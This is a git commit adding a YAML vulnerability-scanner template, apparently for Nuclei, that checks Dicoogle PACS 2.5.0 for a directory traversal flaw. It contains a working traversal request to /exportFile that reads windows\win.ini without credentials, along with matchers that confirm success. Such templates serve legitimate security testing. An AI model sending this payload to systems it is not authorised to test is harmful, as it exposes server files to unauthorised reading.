Create dicoogle-pacs-lfi.yaml

patch-1
Roberto Nunes 2021-12-24 08:57:26 +09:00 committed by GitHub
parent eb325ed007
commit 439a1e966a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 24 additions and 0 deletions

24
dicoogle-pacs-lfi.yaml Normal file
View File

@ -0,0 +1,24 @@
id: dicoogle-pacs-lfi
info:
name: Dicoogle PACS 2.5.0 - Directory Traversal
author: 0x_akoko
severity: high
description: In version 2.5.0, it is vulnerable to local file inclusion. This allows an attacker to read arbitrary files that the web user has access to. Admin credentials aren't required.
reference: https://cxsecurity.com/issue/WLB-2018070131
tags: windows,lfi,dicoogle
requests:
- method: GET
path:
- "{{BaseURL}}/exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini"
stop-at-first-match: true
matchers:
- type: word
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
part: body